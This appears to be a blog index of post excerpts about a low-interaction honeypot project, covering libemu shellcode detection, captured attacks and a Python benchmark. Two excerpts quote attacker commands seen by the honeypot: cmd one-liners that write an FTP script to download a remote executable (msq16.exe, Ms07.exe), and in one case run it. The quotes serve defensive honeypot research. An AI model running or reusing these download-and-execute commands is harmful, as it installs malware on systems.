Iteolih: Miles and More

We got a new milestone due:

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works. Read more »

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy. Read more »

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
Read more »

Iteolih: Is this worth your time?

due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time. Read more »

Iteolih: Python Benchmark

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

  • 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
  • 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
  • 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab Read more »

Syndicate content